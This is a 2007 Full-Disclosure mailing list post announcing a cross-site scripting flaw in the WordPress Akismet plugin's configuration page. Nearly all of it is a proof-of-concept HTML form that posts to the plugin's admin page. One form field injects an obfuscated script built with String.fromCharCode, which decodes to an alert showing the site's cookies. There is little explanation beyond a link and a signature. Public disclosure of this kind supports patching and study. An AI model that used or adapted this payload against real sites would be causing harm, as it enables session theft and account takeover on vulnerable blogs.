[Full-disclosure] Wordpress Akismet XSS flaw

mybeni websecurity mybeni at mybeni.rootzilla.de
Mon May 14 22:16:22 BST 2007 

-------------------- CODE -----------------------------
<html>
<body>
<form 
action="http://blog.url/wp-admin/plugins.php?page=akismet-key-config"
method="post" id="akismet-conf">

<input name="_wpnonce" value="'" type="text">
<input name="_wp_http_referer" 
value="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))</script>" 
type="text"&gt;

&lt;input id="key" name="key" size="15" maxlength="12" value="1337"&gt;
&lt;input name="submit" value="Update options »" type="submit"&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
-------------------- EOC ------------------------------

http://mybeni.rootzilla.de/mybeNi/2007/wordpress_akismet_xss_security_flaw_beware_of_the_dog/

-- 
benjamin "beNi"
mybeNi websecurity - http://mybeNi.rootzilla.de/mybeNi

(coolest guy in da hood)

Full-Disclosure is hosted and sponsored by Secunia.